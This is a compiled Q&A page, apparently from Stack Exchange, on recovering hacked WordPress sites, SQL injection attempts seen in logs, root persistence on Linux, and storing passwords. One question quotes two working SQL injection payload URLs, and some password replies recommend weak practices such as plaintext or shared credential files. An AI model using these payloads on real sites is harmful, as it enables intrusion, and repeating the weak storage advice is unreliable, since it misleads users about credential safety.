How can I search for malicious cron jobs? - cron

I have an account at WebFaction, and multiple sites that have been hacked, now multiple times, over the past month. Most of these are WordPress installs.
Every time this happens I change all passwords -- user, site access, databases, etc. -- update WordPress, and look for cron jobs in the WordPress installs.
I'm pretty confident that I know how to change a password (and generate secure passwords). If there's a gap in my (low level of) knowledge, it's cron jobs and whether or not I might be missing something in working through all of this in terms of a "back door" being left open.
Is there an automated way I can search for these? If I have to manually open every single one of these hundreds and hundreds of compromised PHP files, is there a certain text string or something I can search for that will help me find (and understand) what these are?

If you've been hacked there's only two secure ways: Reinstall completely from known good installation sources or restore a backup that you know for sure was taken before the intrusion.
Once an attacker has gained access to a system, there are so many ways to hide malicious code that it is impossible to go through it all and be sure nothing is left.

Related

Is sharing your C:/Users name a security risk?

I was wanting to show a video of my python code working to someone but in this video I need to show my folders. C:\Users\etc\etc. Is giving the users bit a risk (obviously it's my windows name in place of 'users') because I often see tutorials blocking this name.
Short answer, yes it is a security risk, you are telling someone the username for your system. However, the better question is, should you go to the effort of hiding it based on the security risk?
Unfortunately this question is much harder to answer with a simple yes / no answer and depends a lot on your personal (and your organisations) attitude to risk.
If someone is trying to hack into their system having valid credentials for the system is obviously a good way to go, hence the amount of effort that goes into phishing style e-mails, websites etc. By showing your username you have given the attacker half the things they need (assuming no MFA etc.).
That being said often usernames are often very easy to guess. Built in accounts e.g. Administrator in Windows and root in Linux have been targets in the past, although they are better protected from Network logins these days. In corporate environments, usernames are often e-mail addresses or the user part of the address (the bit before the # symbol).
As well as considering how available your username is in the public domain already you need to consider where is the video going to be shared. For example if you are in a corporate environment where usernames are firstname.lastname and this video is only going to be shared on the company intranet. Well, quite honestly, anyone with access to the video can guess your username.
Based on the hints above you can make your mind up about whether or not you need to hide your username. Let's look at this from another angle, how hard is it to hide the username. Assuming that your demonstration works just as well from any directory on your computer, why not put everything you need in C:\temp and then there is no need to show a path with your username in?
In summary, the choice is yours and I hope you this gives you a guide to how to consider the risks and make an informed choice. Personally (sorry SO rule followers, I will give a quick opinion here) I would avoid showing it as generally it is easy to build a video from a temp directory rather than one off C:\Users\<username> equally when using a Linux system I don't lose any sleep over the fact that the prompt shows my username.

One of our users visited different URLs in my website

I have a affiliate website. I am monitoring which websites are user visiting. For the first time I have noticed a user is visiting following url in my websites which I guess is some kind of hacking attempt. I need help. Constantly my website is performing poor. Sometimes it opens longer than normal time. Sometimes table appears blank. Sometime Cron jobs fail to execute.
Following are the few URLs visited by a user repetitively:
http://www.example.com/product.php?category=study-materials&id=SHOEMHMZH8HPAX4H%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x
http://www.example.com/product.php?category=video-albums&id=SHOEMHMZH8HPAX4H%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3D1
There are lots more such URLs. I am totally confused and bit scared too. What it is exactly and what the user trying to do with such URL? How can I prevent from such actions?
Since morning the user has been visiting from different IP addresses and his or her visited URLs looks like same as I have mentioned.
It's someone trying to break into the site, probably by using a tool of some kind. This happens all the time to every website, since anyone can go off and download tools freely to attack sites.
The URLs you list have attempts to send commands to your database, called SQL Injection. If you look in your web server logs, you'll probably see this kind of thing a lot.
As long as your site has been coded securely, doesn't trust user input, doesn't use vulnerable software (such as out of date plugins or un-patched operating systems) then it may be nothing to worry about.
I presume you didn't write the software. You could always contact the creator of to ask about how it was coded, tested and has it been pentested (which is when a professional hacker has been paid to try to break into the site).

Files form Domina are automatically deleted

Files get automatically deleted from hosting account.
How do i go about finding if its a virus on hosting or if someone with malicious intentions has hacked our hosting.
How do i go about finding cause for this situation.
Thanks
your question is far too general... basically this is a job for a foresic/security analyst... which would in turn need adminitrative (and usually physical) access to the machine...
What you can do:
Check whether there are any accounts that don't belong there
Check for beckground processes like cron/scheduler etc.
Check for viruses/rootkits etc.
This might yield nothing since for a real check you need to boot from a medium which is 100% virus-free
Change ALL passwords to new and very secure ones
Check all logs

Designing a Linux-based system for transferability of ownership/admin rights without total trust

Inspired by a much more specific question on ServerFault.
We all have to trust a huge number of people for the security and integrity of the systems we use every day. Here I'm thinking of all the authors of all the code running on your server or PC, and everyone involved in designing and building the hardware. This is mitigated by reputation and, where source is available, peer review.
Someone else you might have to trust, who is mentioned far less often, is the person who previously had root on a system. Your predecessor as system administrator at work. Or for home users, that nice Linux-savvy friend who configured your system for you. The previous owner of your phone (can you really trust the Factory Reset button?)
You have to trust them because there are so many ways to retain root despite the incoming admin's best efforts, and those are only the ones I could think of in a few minutes. Anyone who has ever had root on a system could have left all kinds of crazy backdoors, and your only real recourse under any Linux-based system I've seen is to reinstall your OS and all code that could ever run with any kind of privilege. Say, mount /home with noexec and reinstall everything else. Even that's not sufficient if any user whose data remains may ever gain privilege or influence a privileged user in sufficient detail (think shell aliases and other malicious configuration). Persistence of privilege is not a new problem.
How would you design a Linux-based system on which the highest level of privileged access can provably be revoked without a total reinstall? Alternatively, what system like that already exists? Alternatively, why is the creation of such a system logically impossible?
When I say Linux-based, I mean something that can run as much software that runs on Linux today as possible, with as few modifications to that software as possible. Physical access has traditionally meant game over because of things like keyloggers which can transmit, but suppose the hardware is sufficiently inspectable / tamper-evident to make ongoing access by that route sufficiently difficult, just because I (and the users of SO?) find the software aspects of this problem more interesting. :-) You might also assume the existence of a BIOS that can be provably reflashed known-good, or which can't be flashed at all.
I'm aware of the very basics of SELinux, and I don't think it's much help here, but I've never actually used it: feel free to explain how I'm wrong.
First and foremost, you did say design :) My answer will contain references to stuff that you can use right now, but some of it is not yet stable enough for production. My answer will also contain allusions to stuff that would need to be written.
You can not accomplish this unless you (as user9876 pointed out) fully and completely trust the individual or company that did the initial installation. If you can't trust this, your problem is infinitely recursive.
I was very active in a new file system several years ago called ext3cow, a copy on write version of ext3. Snapshots were cheap and 100% immutable, the port from Linux 2.4 to 2.6 broke and abandoned the ability to modify or delete files in the past.
Pound for pound, it was as efficient as ext3. Sure, that's nothing to write home about, but it was (and for a large part) still is the production standard FS.
Using that type of file system, assuming a snapshot was made of the pristine installation after all services had been installed and configured, it would be quite easy to diff an entire volume to see what changed and when.
At this point, after going through the diff, you can decide that nothing is interesting and just change the root password, or you can go inspect things that seem a little odd.
Now, for the stuff that has to be written if something interesting is found:
Something that you can pipe the diff though that investigates each file. What you're going to see is a list of revisions per file, at which time they would have to be recursively compared. I.e. , present against former-present, former-present against past1, past1 against past2, etc , until you reach the original file or the point that it no longer exists. Doing this by hand would seriously suck. Also, you need to identify files that were never versioned to begin with.
Something to inspect your currently running kernel. If someone has tainted VFS, none of this is going to work, CoW file systems use temporal inodes to access files in the past. I know a lot of enterprise customers who modify the kernel quite a bit, up to and including modules, VMM and VFS. This may not be such an easy task - comparing against 'pristine' may not be tenable since the old admin may have made good modifications to the kernel since it was installed.
Databases are a special headache, since they change typically each second or more, including the user table. That's going to need to be checked manually, unless you come up with something that can check to be sure that nothing is strange, such a tool would be very specific to your setup. Classic UNIX 'root' is not your only concern here.
Now, consider the other computers on the network. How many of them are running an OS that is known to be easily exploited and bot infested? Even if your server is clean, what if this guy joins #foo on irc and starts an attack on your servers via your own LAN? Most people will click links that a co-worker sends, especially if its a juicy blog entry about the company .. social engineering is very easy if you're doing it from the inside.
In short, what you suggest is tenable, however I'm dubious that most companies could enforce best practices needed for it to work when needed. If the end result is that you find a BOFH in your work force and need to can him, you had better of contained him throughout his employment.
I'll update this answer more as I continue to think about it. Its a very interesting topic. What I've posted so far are my own collected thoughts on the same.
Edit:
Yes, I know about virtual machines and checkpointing, a solution assuming that brings on a whole new level of recursion. Did the (now departed) admin have direct root access to the privileged domain or storage server? Probably, yes, which is why I'm not considering it for the purposes of this question.
Look at Trusted Computing. The general idea is that the BIOS loads the bootloader, then hashes it and sends that hash to a special chip. The bootloader then hashes the OS kernel, which in turn hashes all the kernel-mode drivers. You can then ask the chip whether all the hashes were as expected.
Assuming you trust the person who originally installed and configured the system, this would enable you to prove that your OS hasn't had a rootkit installed by any of the later sysadmins. You could then manually run a hash over all the files on the system (since there is no rootkit the values will be accurate) and compare these against a list provided by the original installer. Any changed files will have to be checked carefully (e.g. /etc/passwd will have changed due to new users being legitimately added).
I have no idea how you'd handle patching such a system without breaking the chain of trust.
Also, note that your old sysadmin should be assumed to know any password typed into that system by any user, and to have unencrypted copies of any private key used on that system by any user. So it's time to change all your passwords.

Where do you record your authentication information (urls/ips/usernames/passwords)?

I'm wondering what people use for storing their username, passwords, urls, IPs, domains, and any other login information they need to both do their job and in general life. It might also store serial numbers or similar data.
I find that I'm registering for probably 5 sites a month, paying some piece of software, just setting up a new hosting account or ssh access to something. By the end of the month, I've both forgot what those sites were and what my username and/or password is--not that I use a completely different password every time. Next month when I go back, I end up using the forgot password and then changing the password to something that I'll forget.
I'm also thinking it needs to be mobile, probably browser based (not a USB key or other protable media) and very secure.
I'm thinking there are maybe 2 different solutions: one for a company where everyone in the company can access it and one where it's only you.
What does everyone else use to store their authentication information?
Edit: I'm looking for something to store more than just a username and password. It needs to store IPs or domains for example for SSH access. It also needs to have the ability to put some kind of comment in or other information because, for example, the site maybe limited to 1 IP.
I use KeePass. It has versions for various platforms (KeePassX for Linux, for example) and has been quite stable for me. No lost data yet, so I haven't had to resort to my backups :)
I use PasswordMaker and it's fantastic Mozilla Firefox add-on. All passwords are generated from a website URL and your username. You enter a master password which then essentially "unlocks" all your passwords so you really only have to remember one password but can have a unique password for each website you have an account on.
PasswordMaker was also recommended by Jim McKeeth in Stack Overflow Podcast #9.
Note also that there are many other ways to integrate with PasswordMaker besides the Firefox add-on. For example, they have an online version that can be used essentially anywhere as long.
I use a certain string of characters in all my passwords, then for each new site I register on I append another string of characters which can be determined by looking at the site's name or URL. All I have to remember is the base password and the algorithm for determining the rest of the password.
Try Password Gorilla and use GetDropBox.com to keep it synced across machines. I think it was recommended by the developers of this site.
I keep everything always with me on my Treo, with SplashId. (Handles custom fields, too)
I have two different solutions:
For work related passwords (login to our webbservers and mysql users and logins), we use a shared google doc. It's not ideal, but it's better than having just one password (we did when I started), and it's better than being locked out if one guy gets run over by a bus.
My private solution is a variant of Jeremy Rutens solution, an algo that gives a couple of chars based on the url/hostname and another algo for the second half of the password (which usually gives me two or three choices when I've forgotten the pass - but that takes just a few minutes extra).
Here's a simple solution that I think fits your requirements.
Store all your usernames, passwords, URLs, IPs, whatever in a plain text file. Yes, really. You may even want to have one text file for usernames & passwords, another for URLs, another for IPs ... whatever works for you.
Alternatively, if you'll have MS Office, Open Office, Star Office, or some other compatible office program available at every site, a spreadsheet works splendidly for this type of thing.
Zip this (these) file(s) up and apply a good password.
Attach this zip file to an e-mail you keep in your favorite Web-based e-mail box. To keep it easy to find, you might want to create a separate folder, or just create a separate e-mail account just for this purpose.
That's it. Assuming you can rely on have a Web browser with access to your Web mail, an unzip utility, and a text file reader (or better yet, spreadsheet reader), you can access your information securely from anywhere.
I use Password Safe. You can store, organize and retrieve all the essentials in a snap. It also has a handy "generate random password" that I use more and more, especially for those once-in-a-while-never-worth-remembering-the-password sites.
http://passwordsafe.sourceforge.net/
I store my passwords in text files on an encrypted partition.
Like claudiu I use a several tier system and my memory, I have a good handful of passwords that I know all from memory, and depending on what type of stuff I'm using depends on what passwords I use. Effectively I have two or three passwords for each of my "tier" catagories. Sometimes I have to try several of them if it's a site I don't use often until I get in. Though typically I'm very good at remembering which one's I uses on which sites.
Clipperz looks like a good solution. It allows you to store pretty much anything you want and encrypts all of your data with your password. It also includes an export feature and offline read-only version. And it's free!
Keepassc (https://github.com/raymontag/keepassc) on my Linux machines, with the database file stored within Dropbox so it can be synced with my Android phone (KeepassDroid) and Windows machines (Keepass). Works great!
Use the same password for everything. Give it out to strangers.
Just kidding. I use three tiers of passwords - the lowest one is really easy to remember, and applies to all accounts whose security I don't care about. I just use it for most things like this.
For the other stuff, I don't find it to be such sensitive information, so I'll store them in a large "info.txt" text file. I'll put a password hint next to it, such as "the bad one", or "double z" for example, if I have a password I use a lot that has two zs in it. I just use standard CTRL+F search to lookup the info.

Resources